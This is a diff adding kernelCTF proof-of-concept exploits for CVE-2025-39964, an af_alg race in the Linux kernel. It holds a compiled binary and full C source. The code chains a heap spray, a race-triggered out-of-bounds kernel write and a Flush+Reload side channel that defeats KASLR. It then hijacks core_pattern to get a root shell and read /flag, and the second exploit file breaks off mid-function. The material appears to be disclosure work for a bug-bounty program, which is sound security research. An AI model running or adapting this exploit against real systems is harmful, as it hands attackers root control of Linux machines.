+ read(core, core_pattern_buf, sizeof(core_pattern_buf));
+ close(core);
+ return strncmp(core_pattern_buf, "|/proc/%P/fd/666", 0x10) == 0;
+}
+
+void crash(char *cmd) {
+ int memfd = memfd_create("", 0);
+ /* send our binary to memfd for core_pattern payload */
+ SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff));
+ /* our binary now at file descriptor 666 */
+ dup2(memfd, 666);
+ close(memfd);
+ while (check_core() == 0)
+ sleep(1);
+ puts("Root shell !!");
+ /* Trigger program crash and cause kernel to execute program from core_pattern
+ * which is our "root" binary */
+ *(size_t *)0 = 0;
+}
+
+size_t bypass_kaslr(u64 base);
+
+int guess_addr(size_t guesss) {
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = guesss;
+ write(cfd[1], buf, 0x100);
+ buf[0] = 'b';
+ int x = send(opfd, buf, 1, MSG_MORE);
+ printf("x: %d\n", x);
+ return x == 1;
+}
+
+int trigger_exploit();
+int main(int argc, char **argv) {
+
+ setvbuf(stdin, 0, 2, 0);
+ setvbuf(stdout, 0, 2, 0);
+ puts("Exploit start");
+ if (argc == 1) {
+ size_t stext = 0;
+ if (getenv("KTEXT"))
+ stext = strtoull(getenv("KTEXT"), 0, 16);
+ else
+ stext = bypass_kaslr(0);
+ /* core_pattern symbol is at a fixed offset from _stext */
+ core_pattern = stext + CORE_PATTERN_COS_OFFSET;
+ printf("got stext 0x%zx 0x%zx\n", stext, core_pattern);
+ }
+
+ struct rlimit rlim = {.rlim_cur = 0xf000, .rlim_max = 0xf000};
+ setrlimit(RLIMIT_NOFILE, &rlim);
+
+ if (argc > 1) {
+#define SYS_pidfd_getfd 438
+ int pid = strtoull(argv[1], 0, 10);
+ int pfd = syscall(SYS_pidfd_open, pid, 0);
+ int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
+ int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
+ int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
+ dup2(stdinfd, 0);
+ dup2(stdoutfd, 1);
+ dup2(stderrfd, 2);
+ /* Run cat /flag multiple times to ensure output is flushed before reboot */
+ for (int i = 0; i < 6; i++)
+ system("cat /flag");
+
+ system("cat /flag;echo o>/proc/sysrq-trigger");
+ execlp("bash", "bash", NULL);
+ }
+ /* Step 7: fork a watcher that polls core_pattern and triggers crash once
+ * overwritten */
+ if (fork() == 0) {
+ set_cpu(0);
+ setsid();
+ crash("");
+ }
+ /* Retry loop: trigger_exploit() may fail the race; restart on failure */
+ while (1) {
+ if (fork() == 0) {
+ trigger_exploit();
+ exit(0);
+ }
+ wait(NULL);
+ }
+}
+
+int trigger_exploit() {
+ int tfmfd;
+
+ set_cpu(1);
+ SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, cfd));
+
+ /* Step 1: spray heap with crafted msg_control buffers */
+ spray_unix_sockets();
+
+ char *addr = SYSCHK(mmap(0, MMAP_REGION_LEN, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANON, -1, 0));
+ struct iovec local = {.iov_base = addr, .iov_len = MMAP_REGION_LEN};
+ struct iovec remote = {.iov_base = addr, .iov_len = MMAP_REGION_LEN};
+
+ struct sockaddr_alg sa = {
+ .salg_family = AF_ALG,
+ .salg_type = "skcipher", /* symmetric key cipher */
+ .salg_name = "cbc(aes)", /* AES in CBC mode */
+ };
+
+ /* Step 2: create and bind the AF_ALG transformation socket */
+ tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0);
+ if (tfmfd == -1) {
+ perror("socket");
+ return 1;
+ }
+
+ if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) != 0) {
+ perror("bind");
+ close(tfmfd);
+ return 1;
+ }
+
+ unsigned char key[32] = {0};
+ if (setsockopt(tfmfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) != 0) {
+ perror("setsockopt");
+ close(tfmfd);
+ return 1;
+ }
+
+ opfd = accept(tfmfd, NULL, 0);
+ if (opfd == -1) {
+ perror("accept");
+ close(tfmfd);
+ return 1;
+ }
+
+ int val = 0x1000;
+
+ struct {
+ struct cmsghdr cmsg;
+ __u32 op;
+ __u32 ivlen;
+ unsigned char iv[16];
+ } __attribute__((__packed__)) msg;
+
+ memset(&msg, 0, sizeof(msg));
+ msg.cmsg.cmsg_level = SOL_ALG;
+ msg.cmsg.cmsg_type = ALG_SET_OP;
+ msg.cmsg.cmsg_len = CMSG_LEN(sizeof(__u32) + sizeof(__u32) + 16);
+
+ msg.op = ALG_OP_ENCRYPT;
+ msg.ivlen = 16;
+ memset(msg.iv, 0x01, 16);
+
+ struct iovec iov = {
+ .iov_base = buf,
+ .iov_len = 0x1000,
+ };
+
+ struct msghdr msgh;
+ memset(&msgh, 0, sizeof(msgh));
+ msgh.msg_iov = &iov;
+ msgh.msg_iovlen = 1;
+ msgh.msg_control = &msg;
+ msgh.msg_controllen = msg.cmsg.cmsg_len;
+
+ /* Step 3: initial sendmsg to initialise the tsgl; advances sgl->cur to 1 */
+ ssize_t n = sendmsg(opfd, &msgh, MSG_MORE);
+ printf("init %ld\n", n);
+
+ /*
+ * Step 3 (cont): advance sgl->cur from 1 to 124 (MAX_SGL_ENTS - 2) using
+ * SGL_MERGE_ITERATIONS = 0x7b send+recv pairs. Each send allocates one sg
+ * entry (cur++); each recv drains the processed entry so the socket stays
+ * writable. The loop comment in the original PR is:
+ * "the loop with 0x7b + the sendmsg and send calls executes 125 times,
+ * matching MAX_SGL_ENTS - 1 = 126 - 1 = 125."
+ */
+ for (int i = 0; i < SGL_MERGE_ITERATIONS; i++) {
+ SYSCHK(send(opfd, buf, 0x1000, MSG_MORE));
+ n = recv(opfd, buf, 0x1000, 0);
+ }
+
+ /* Advance sgl->cur to 125 = MAX_SGL_ENTS - 1 (one slot before the list is
+ * full) */
+ send(opfd, buf, 0x1000, MSG_MORE);
+ SYSCHK(setsockopt(opfd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val)));
+ printf("setsockopt done\n");
+
+ /*
+ * Step 3 (race): fork two children that race each other:
+ *
+ * Child A (send invalid addr): passes INVALID_USER_ADDR, which causes
+ * af_alg_alloc_tsgl() to allocate a new tsgl (sgl->cur → 0) then fail
+ * in memcpy_from_msg() — leaving ctx->merge = 1 and sgl->cur = 0.
+ *
+ * Child B (send 0x200 bytes): sends a sub-page-size buffer so that
+ * ctx->merge is set to 1 and sgl->cur advances to MAX_SGL_ENTS = 126.
+ *
+ * Desired outcome: both children finish such that ctx->merge == 1 AND the
+ * last tsgl has sgl->cur == 0. The next send() will then use sg[-1].
+ */
+ if (fork() == 0) {
+ /* Child A: trigger new-tsgl allocation then fail — sets sgl->cur = 0 */
+ int x = send(opfd, INVALID_USER_ADDR, 0x400, MSG_MORE);
+ printf("send3 %d\n", x);
+ exit(0);
+ }
+
+ if (fork() == 0) {
+ /* Child B: sub-page send sets ctx->merge = 1 and fills sgl->cur to
+ * MAX_SGL_ENTS */
+ int x = send(opfd, buf, 0x200, MSG_MORE);
+ printf("send2 %d\n", x);
+ exit(0);
+ }
+
+ /*
+ * @sleep(desc="wait for both fork children to reach their send() calls and
+ * set ctx->merge=1 with sgl->cur=0 before we recv()")
+ */
+ sleep(1);
+ n = recv(opfd, buf, 0x1000, 0);
+ printf("recv2 %ld\n", n);
+ wait(NULL);
+
+ /* Step 4: release spray threads so they re-send their crafted payloads */
+ for (int i = 0; i < THREAD_NUM; i++) {
+ write(cfd[1], buf, 1);
+ }
+
+ n = recv(opfd, buf, 0x1000, 0);
+ printf("recv2 %ld\n", n);
+
+ memset(buf, 'z', 0x1000);
+ wait(NULL);
+
+ /* Step 5: map userspace oracle region for the binary search */
+ allocate_map();
+
+ /* Step 5 (OOB trigger): with ctx->merge=1 and sgl->cur=0 this send uses
+ * sg[-1].page_link from our sprayed payload — triggering the OOB write.
+ * Returns -1 if the write destination is unmapped (race failed); 1 if mapped.
+ */
+ int x = send(opfd, buf, 1, MSG_MORE);
+
+ if (x == 1) {
+ puts("Race fail");
+ exit(0);
+ }
+
+ /*
+ * Step 5 (binary search oracle):
+ *
+ * Background:
+ * sg[-1].page_link is effectively a pointer to a struct page in vmemmap.
+ * The kernel computes the write destination as:
+ * dest = page_address(sg_page(sg)) + sg->offset + sg->length
+ * = page_offset_base + (page_link - vmemmap_base) / 64 * PAGE_SIZE
+ * + offset + length
+ * With page_link ≈ 0, the pfn arithmetic wraps to a very large value, and
+ * (page_offset_base + pfn * PAGE_SIZE) wraps further to land within our
+ * userspace oracle region [SCAN_START_ADDR, SCAN_END_ADDR).
+ *
+ * Oracle:
+ * send() returns 1 → the write destination is in a mapped page (success).
+ * send() returns -1 → the destination is unmapped (copy_from_user failed).
+ * By progressively munmap-ing halves of the oracle region we can determine
+ * which physical page corresponds to the OOB write target.
+ *
+ * Binary search (8 iterations → narrows range from SCAN_END_ADDR to ~340 MB):
+ * Each iteration j tests: "if I decrease page_link by half_range/64, does
+ * the write still succeed?"
+ * - Decreasing page_link by Δ shifts dest by Δ*64 bytes (since each
+ * struct-page unit = 64 bytes = one PAGE_SIZE/64 step in physmap).
+ * - The test delta (SCAN_END_ADDR >> (7+j)) in page_link units equals
+ * half_range = (SCAN_END_ADDR >> (1+j)) in dest-address units.
+ * If the shifted oracle still succeeds → dest is in the *upper* half →
+ * unmap the lower half and advance start.
+ * Otherwise → dest is in the *lower* half → unmap the upper half.
+ */
+ size_t oracle;
+ size_t leak_offset = 0;
+ int xcnt = 0;
+ for (int k = 0; k < MAX_SCAN_ITERATIONS; k++) {
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] -= (SCAN_END_ADDR >> 6);
+ write(cfd[1], buf, 0x100);
+ buf[0] = 'a';
+ x = send(opfd, buf, 1, MSG_MORE);
+ if (x == 1) {
+ puts("");
+ xcnt++;
+ oracle = *(size_t *)&payload[PAYLOAD_OFFS_TARGET];
+ char *start = (void *)(0ULL);
+ for (int j = 0; j < 8; j++) {
+ printf("loop j: %d\n", j);
+ x = guess_addr(oracle - (SCAN_END_ADDR >> (7 + j)));
+ if (x == 1) {
+ xcnt++;
+ start += (SCAN_END_ADDR >> (1 + j)); /* upper half */
+ munmap(start - (SCAN_END_ADDR >> (1 + j)),
+ (SCAN_END_ADDR >> (1 + j)));
+ } else {
+ munmap(start + (SCAN_END_ADDR >> (1 + j)),
+ (SCAN_END_ADDR >> (1 + j)));
+ }
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle;
+ /* search_offset returns the exact userspace VA of the OOB-written page */
+ leak_offset = search_offset(start) + xcnt;
+ printf("leak_offset %zx\n", leak_offset);
+ printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]);
+
+ break;
+ }
+ }
+
+ if (leak_offset == 0)
+ exit(0);
+
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle;
+ write(cfd[1], buf, 0x100);
+
+ /*
+ * Step 6: redirect the OOB write to core_pattern.
+ *
+ * leak_offset is the VA of the currently-targeted physical page.
+ * core_pattern is the KASLR-adjusted kernel VA of core_pattern[].
+ *
+ * First, align within-page: send adjust_offset bytes so that after the
+ * advance the write starts at the same within-page offset as core_pattern.
+ */
+ size_t adjust_offset =
+ PAGE_SIZE + (core_pattern & PAGE_MASK) - (leak_offset & PAGE_MASK);
+ leak_offset += adjust_offset;
+
+ memset(buf, 'z', 0x1000);
+ SYSCHK(send(opfd, buf, adjust_offset - 1, MSG_MORE));
+ SYSCHK(send(opfd, buf, 1, MSG_MORE));
+
+ printf("sg->len overflow check %x\n", *(char *)(leak_offset - 1));
+ if (*(char *)(leak_offset - 1) != 'z')
+ leak_offset -= 0x100000000ULL;
+
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+
+ /*
+ * Now adjust payload[PAYLOAD_OFFS_TARGET] (= sg[-1].page_link) so that
+ * page_address(sg_page(sg)) points to the physical page holding core_pattern.
+ * The >> 6 (or / 64) is actually a simplification of the formula
+ * (addr / 0x1000) * 64. We divide the address by 0x1000 to find the page
+ * index, and then multiply by 64 because each memory page has a page_struct
+ * that is exactly 64 bytes long.
+ * payload[PAYLOAD_OFFS_TARGET] is sg[-1].page_link, which controls dest via
+ * the formula described in the binary search comment above.
+ */
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] +=
+ (((core_pattern & ~PAGE_MASK) - (leak_offset & ~PAGE_MASK)) >> 6);
+ printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]);
+ write(cfd[1], buf, 0x100);
+ /* Step 6 (write): send the core_pattern string; kernel copies it to
+ * core_pattern[] */
+ char mcore[64] = "|/proc/%P/fd/666 %P";
+ SYSCHK(send(opfd, mcore, 64, MSG_MORE));
+ PAUSE;
+
+ return 0;
+}
+
+inline __attribute__((always_inline)) uint64_t rdtsc_begin() {
+ uint64_t a, d;
+ asm volatile("mfence\n\t"
+ "RDTSCP\n\t"
+ "mov %%rdx, %0\n\t"
+ "mov %%rax, %1\n\t"
+ "xor %%rax, %%rax\n\t"
+ "lfence\n\t"
+ : "=r"(d), "=r"(a)
+ :
+ : "%rax", "%rbx", "%rcx", "%rdx");
+ a = (d << 32) | a;
+ return a;
+}
+
+inline __attribute__((always_inline)) uint64_t rdtsc_end() {
+ uint64_t a, d;
+ asm volatile("xor %%rax, %%rax\n\t"
+ "lfence\n\t"
+ "RDTSCP\n\t"
+ "mov %%rdx, %0\n\t"
+ "mov %%rax, %1\n\t"
+ "mfence\n\t"
+ : "=r"(d), "=r"(a)
+ :
+ : "%rax", "%rbx", "%rcx", "%rdx");
+ a = (d << 32) | a;
+ return a;
+}
+
+void prefetch(void *p) {
+ asm volatile("prefetchnta (%0)\n"
+ "prefetcht2 (%0)\n"
+ :
+ : "r"(p));
+}
+
+size_t flushandreload(void *addr) /* row miss */
+{
+ size_t time = rdtsc_begin();
+ prefetch(addr);
+ size_t delta = rdtsc_end() - time;
+ return delta;
+}
+
+/*
+ * KASLR bypass via Flush+Reload side channel.
+ *
+ * Uncomment KASLR_BYPASS_INTEL for Intel CPUs (kernelCTF remote instances).
+ * Keep commented for GitHub CI (AMD/other) to use the sliding-window variant.
+ * Alternatively pass -DKASLR_BYPASS_INTEL to the compiler without touching
+ * source.
+ */
+// #define KASLR_BYPASS_INTEL
+size_t bypass_kaslr(u64 base) {
+ if (!base) {
+#ifdef KASLR_BYPASS_INTEL
+#define OFFSET 0
+#define START (0xffffffff81000000ull + OFFSET)
+#define END (0xffffffffD0000000ull + OFFSET)
+#define STEP 0x0000000001000000ull
+ while (1) {
+ u64 bases[7] = {0};
+ for (int vote = 0; vote < ARRAY_LEN(bases); vote++) {
+ size_t times[(END - START) / STEP] = {};
+ uint64_t addrs[(END - START) / STEP];
+
+ for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+ times[ti] = ~0;
+ addrs[ti] = START + STEP * (u64)ti;
+ }
+
+ for (int i = 0; i < 16; i++) {
+ for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+ u64 addr = addrs[ti];
+ size_t t = flushandreload((void *)addr);
+ if (t < times[ti]) {
+ times[ti] = t;
+ }
+ }
+ }
+
+ size_t minv = ~0;
+ size_t mini = -1;
+ for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) {
+ if (times[ti] < minv) {
+ mini = ti;
+ minv = times[ti];
+ }
+ }
+
+ if (mini < 0) {
+ return -1;
+ }
+
+ bases[vote] = addrs[mini];
+ }
+
+ int c = 0;
+ for (int i = 0; i < ARRAY_LEN(bases); i++) {
+ if (c == 0) {
+ base = bases[i];
+ } else if (base == bases[i]) {
+ c++;
+ } else {
+ c--;
+ }
+ }
+
+ c = 0;
+ for (int i = 0; i < ARRAY_LEN(bases); i++) {
+ if (base == bases[i]) {
+ c++;
+ }
+ }
+ if (c > ARRAY_LEN(bases) / 2) {
+ base -= OFFSET;
+ goto got_base;
+ }
+
+ printf("majority vote failed:\n");
+ printf("base = %llx with %d votes\n", base, c);
+ }
+#else
+#define START (0xffffffff81000000ull)
+#define END (0xffffffffc0000000ull)
+#define STEP 0x0000000000200000ull
+#define NUM_TRIALS 9
+/* largest contiguous mapped area at the beginning of _stext */
+#define WINDOW_SIZE 11
+
+ while (1) {
+ u64 bases[NUM_TRIALS] = {0};
+
+ for (int vote = 0; vote < ARRAY_LEN(bases); vote++) {
+ size_t times[(END - START) / STEP] = {};
+ uint64_t addrs[(END - START) / STEP];
+
+ for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+ times[ti] = ~0;
+ addrs[ti] = START + STEP * (u64)ti;
+ }
+
+ for (int i = 0; i < 16; i++) {
+ for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+ u64 addr = addrs[ti];
+ size_t t = flushandreload((void *)addr);
+ if (t < times[ti]) {
+ times[ti] = t;
+ }
+ }
+ }
+
+ uint64_t max = 0;
+ int max_i = 0;
+ for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) {
+ uint64_t sum = 0;
+ for (int i = 0; i < WINDOW_SIZE; i++) {
+ sum += times[ti + i];
+ }
+ if (sum > max) {
+ max = sum;
+ max_i = ti;
+ }
+ }
+
+ bases[vote] = addrs[max_i];
+ }
+
+ int c = 0;
+ for (int i = 0; i < ARRAY_LEN(bases); i++) {
+ if (c == 0) {
+ base = bases[i];
+ } else if (base == bases[i]) {
+ c++;
+ } else {
+ c--;
+ }
+ }
+
+ c = 0;
+ for (int i = 0; i < ARRAY_LEN(bases); i++) {
+ if (base == bases[i]) {
+ c++;
+ }
+ }
+ if (c > ARRAY_LEN(bases) / 2) {
+ goto got_base;
+ }
+
+ printf("majority vote failed:\n");
+ printf("base = %llx with %d votes\n", base, c);
+ }
+#endif
+ }
+
+got_base:
+
+ printf("using kernel base %llx\n", base);
+
+ return base;
+}
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/Makefile b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/Makefile
new file mode 100644
index 000000000..3eabaca61
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/Makefile
@@ -0,0 +1,5 @@
+all: exploit
+
+exploit: exploit.c
+ gcc -static-pie -o exploit exploit.c
+
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit
new file mode 100755
index 000000000..16c519ca2
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit differ
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit.c b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit.c
new file mode 100644
index 000000000..837b3b79a
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit.c
@@ -0,0 +1,899 @@
+/*
+ * Exploit for CVE-2025-39964 — Linux af_alg out-of-bounds write (LTS 6.12.44)
+ *
+ * Vulnerability: af_alg_sendmsg() has a race condition allowing two concurrent
+ * sendmsg calls to produce ctx->merge=1 with sgl->cur=0 simultaneously.
+ * In this state the merge branch computes sg = sgl->sg + sgl->cur - 1 = sg[-1],
+ * which is an out-of-bounds read into the previous heap chunk. The
+ * sg[-1].page_link value from the previous chunk controls the destination of
+ * memcpy_from_msg(), giving an arbitrary kernel write primitive.
+ *
+ * Exploit chain (LTS 6.12.44):
+ * 1. Spray 0x100 AF_UNIX socket pairs; each thread sends a crafted msghdr
+ * whose msg_control (payload[]) lands in the heap slot just before an
+ * af_alg_tsgl. payload[PAYLOAD_OFFS_TARGET] controls sg[-1].page_link = write
+ * destination.
+ * 2. Set up an AF_ALG socket (AES-CBC); advance sgl->cur to MAX_SGL_ENTS-1 =
+ * 125 using 1 sendmsg + SGL_MERGE_ITERATIONS send/recv pairs + 1 more send.
+ * 3. Fork two children that race: one sets ctx->merge=1
+ * (sgl->cur→MAX_SGL_ENTS), the other allocates a new sgl (sgl->cur→0) via an
+ * invalid userspace pointer.
+ * 4. With ctx->merge=1 and sgl->cur=0, the next sendmsg triggers the OOB write
+ * to the address derived from payload[PAYLOAD_OFFS_TARGET].
+ * 5. Map [SCAN_START_ADDR, SCAN_END_ADDR) in MAP_CHUNK_SIZE (2 GB) chunks so
+ * the OOB write destination (which wraps into userspace due to page_link
+ * arithmetic) falls in a mapped region. An 8-step binary search (oracle =
+ * send() return value) narrows the target to a ~340 MB window; mincore then
+ * locates the exact page.
+ * 6. Adjust the write destination via page_link arithmetic to point to the
+ * core_pattern kernel symbol, then write "|/proc/%P/fd/666 %P".
+ * 7. A forked child watches for core_pattern to change, then faults (NULL
+ * deref), causing the kernel to execute our binary as root via core_pattern.
+ * 8. Re-exec reads /flag via pidfd_getfd() on the parent's stdio descriptors.
+ */
+
+#define _GNU_SOURCE
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#ifndef SYS_pidfd_getfd
+#define SYS_pidfd_getfd 438
+#endif
+
+#ifndef SYS_pidfd_open
+#define SYS_pidfd_open 434
+#endif
+
+size_t vmemmap_base = 0xffffea0000000000ULL;
+size_t page_offset_base = 0xffff888000000000ULL;
+size_t core_pattern = 0xffffffff8420d520ULL;
+
+/* Socket options */
+#define ALG_SET_KEY 1
+#define ALG_SET_IV 2
+#define ALG_SET_OP 3
+#define ALG_SET_AEAD_ASSOCLEN 4
+#define ALG_SET_AEAD_AUTHSIZE 5
+#define ALG_SET_DRBG_ENTROPY 6
+#define ALG_SET_KEY_BY_KEY_SERIAL 7
+
+/* Operations */
+#define ALG_OP_DECRYPT 0
+#define ALG_OP_ENCRYPT 1
+
+typedef unsigned char u8;
+typedef unsigned short u16;
+typedef unsigned int u32;
+typedef unsigned long long u64;
+typedef char i8;
+typedef short i16;
+typedef int i32;
+typedef long long i64;
+#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0]))
+
+#define __u32 uint32_t
+#define __u16 uint16_t
+#define __u8 uint8_t
+#define PAUSE \
+ { \
+ int x; \
+ printf(":"); \
+ read(0, &x, 1); \
+ }
+
+#define SYSCHK(x) \
+ ({ \
+ typeof(x) __res = (x); \
+ if (__res == (typeof(x))-1) \
+ err(1, "SYSCHK(" #x ")"); \
+ __res; \
+ })
+
+#ifndef SYS_process_vm_readv
+#define SYS_process_vm_readv 310
+#endif
+
+/* Number of AF_UNIX pairs to spray; one pair per exploit thread */
+#define THREAD_NUM 0x100
+
+/*
+ * Size of each private anonymous mapping used as the OOB write oracle region:
+ * 512 PTEs per page * PAGE_SIZE = 2 MB physical coverage per mmap entry.
+ */
+#define MMAP_REGION_LEN (0x1000 / 8 * 0x1000)
+
+/*
+ * Start of the contiguous userspace region we map for the binary-search oracle.
+ * We start just above the 4 GB boundary to avoid the low userspace region.
+ */
+#define SCAN_START_ADDR 0x100000000ULL
+
+/* Maximum number of mincore windows tried during the page-address scan */
+#define MAX_SCAN_ITERATIONS 0x50
+
+/*
+ * Unmapped address passed as invalid user pointer to trigger the race
+ * condition: the first 4 MB of virtual address space (0–0xfff000) is always
+ * unmapped.
+ */
+#define INVALID_USER_ADDR ((void *)0xfff000)
+
+/*
+ * Byte offset of sg[-1].page_link inside the sprayed msg_control payload:
+ * af_alg_tsgl is allocated in a 4096-byte slab object.
+ * sgl->sg[0] starts at byte 24 (sizeof(af_alg_tsgl)).
+ * sg[-1] = sgl->sg[-1] lies 32 bytes (sizeof(scatterlist)) before sg[0],
+ * i.e. at byte 24 - 32 = -8 relative to the tsgl object start.
+ * In the *previous* 4096-byte heap object that is offset 4096 - 8 = 0xff8.
+ * scatterlist.page_link is the first field (offset 0), so payload[0xff8]
+ * directly controls the page_link that the OOB write uses as its destination.
+ */
+#define PAYLOAD_OFFS_TARGET 0xff8
+
+/*
+ * Number of send/recv iterations to advance sgl->cur from 1 to 124
+ * (MAX_SGL_ENTS-2). MAX_SGL_ENTS = (4096 - sizeof(af_alg_tsgl)) /
+ * sizeof(scatterlist) - 1 = (4096 - 24) / 32 - 1 = 126. One initial sendmsg
+ * sets cur=1; SGL_MERGE_ITERATIONS send+recv pairs bring it to 1 + 0x7b = 124;
+ * one more send brings it to 125 = MAX_SGL_ENTS - 1.
+ */
+#define SGL_MERGE_ITERATIONS 0x7b
+
+/* Compile-time unslid base of kernel text (_stext); used when computing symbol
+ * offsets */
+#define KERNEL_TEXT_BASE 0xffffffff81000000UL
+
+/*
+ * KASLR-invariant offset of core_pattern from _stext in LTS 6.12.44.
+ * core_pattern is at 0xffffffff8420e260; _stext is at KERNEL_TEXT_BASE.
+ */
+#define CORE_PATTERN_LTS_OFFSET (0xffffffff8420e260UL - KERNEL_TEXT_BASE)
+
+/* Upper bound of the userspace oracle scan region [SCAN_START_ADDR,
+ * SCAN_END_ADDR) */
+#define SCAN_END_ADDR 0x500000000000ULL
+
+/* Size of each anonymous 2 GB mmap chunk used to cover the oracle region */
+#define MAP_CHUNK_SIZE 0x80000000ULL
+
+#ifndef PAGE_SIZE
+#define PAGE_SIZE 0x1000
+#endif
+/* Page offset mask for within-page alignment (PAGE_SIZE - 1) */
+#define PAGE_MASK (PAGE_SIZE - 1)
+
+pthread_t tid[THREAD_NUM];
+
+/* Shared scratch buffer used by spray threads and the main exploit loop */
+char buf[0x10000];
+char vec[0x100000];
+
+int cfd[2];
+int sfd[THREAD_NUM][2];
+char payload[0x1000];
+int opfd;
+
+struct sockaddr_alg {
+ __u16 salg_family;
+ __u8 salg_type[14];
+ __u32 salg_feat;
+ __u32 salg_mask;
+ __u8 salg_name[64];
+};
+
+void set_cpu(int i) {
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(i, &mask);
+ sched_setaffinity(0, sizeof(mask), &mask);
+}
+
+void *spray_send_thread(void *x) {
+ size_t idx = (size_t)x;
+ write(cfd[0], buf, 1);
+ read(cfd[0], buf, 1);
+ struct iovec iov = {buf, 0x1000};
+ struct msghdr mhdr = {.msg_iov = &iov,
+ .msg_iovlen = 1,
+ .msg_control = payload,
+ .msg_controllen = 0x1000};
+ while (1) {
+ sendmsg(sfd[idx][1], &mhdr, 0);
+ write(cfd[0], buf, 1);
+ read(cfd[0], buf, 1);
+ }
+}
+
+/*
+ * Step 1: Spray THREAD_NUM AF_UNIX socket pairs, each sending a crafted msghdr
+ * whose msg_control buffer (payload[]) will occupy the heap slot immediately
+ * preceding an af_alg_tsgl allocation. payload[PAYLOAD_OFFS_TARGET] then
+ * aliases sg[-1].page_link and controls the OOB write destination.
+ */
+void spray_unix_sockets() {
+ memset(payload, 'a', 0x1000);
+ struct cmsghdr *first;
+ first = (struct cmsghdr *)payload;
+ first->cmsg_len = 0x1000;
+ first->cmsg_level =
+ 0; /* must differ from SOL_SOCKET=1 to skip cmsg processing */
+ first->cmsg_type = 0x41414141; /* dummy filler value */
+ /* Initially zero; the binary search will update this to guide the OOB write
+ */
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = 0;
+
+ for (int i = 0; i < THREAD_NUM; i++) {
+ SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sfd[i]));
+ int n = 0x800;
+ setsockopt(sfd[i][1], SOL_SOCKET, SO_SNDBUF, (char *)&n, sizeof(n));
+ setsockopt(sfd[i][0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n));
+ write(sfd[i][1], buf, 0x1000);
+ }
+
+ for (int i = 0; i < THREAD_NUM; i++)
+ pthread_create(&tid[i], 0, spray_send_thread, (void *)(size_t)i);
+
+ for (int i = 0; i < THREAD_NUM; i++)
+ read(cfd[1], buf, 1);
+}
+
+/*
+ * Step 5a: Map the full userspace range [SCAN_START_ADDR, SCAN_END_ADDR) with
+ * physical pages in MAP_CHUNK_SIZE (2 GB) chunks. When sg[-1].page_link is
+ * crafted with a value near 0, the kernel's page_address() computation wraps
+ * around and the OOB write destination lands somewhere within this region.
+ * Mapping real pages here means the write silently succeeds (our oracle),
+ * letting us binary-search for the exact physical page by progressively
+ * munmap-ing halves of this range.
+ */
+void allocate_map() {
+ char *start = (void *)SCAN_START_ADDR;
+ while (1) {
+ start = SYSCHK(mmap(start, MAP_CHUNK_SIZE, PROT_READ | PROT_WRITE,
+ MAP_SHARED | MAP_ANON | MAP_FIXED, -1, 0));
+ start += MAP_CHUNK_SIZE;
+ if ((size_t)start >= SCAN_END_ADDR)
+ break;
+ }
+}
+
+/*
+ * Step 5b: Use mincore to find the exact virtual address in [start, start+4GB)
+ * that corresponds to the physical page the OOB write targets. A page marked
+ * resident (mincore bit = 1) that also contains our spray marker ('a') is the
+ * hit: it is the page that the kernel's arbitrary-write wrote into.
+ */
+size_t search_offset(char *start) {
+ char *pvec = NULL;
+ for (int i = 0; i < MAX_SCAN_ITERATIONS; i++) {
+ mincore((void *)start, 0x100000000ULL, vec);
+ pvec = memchr(vec, 1, 0x100000);
+ if (pvec) {
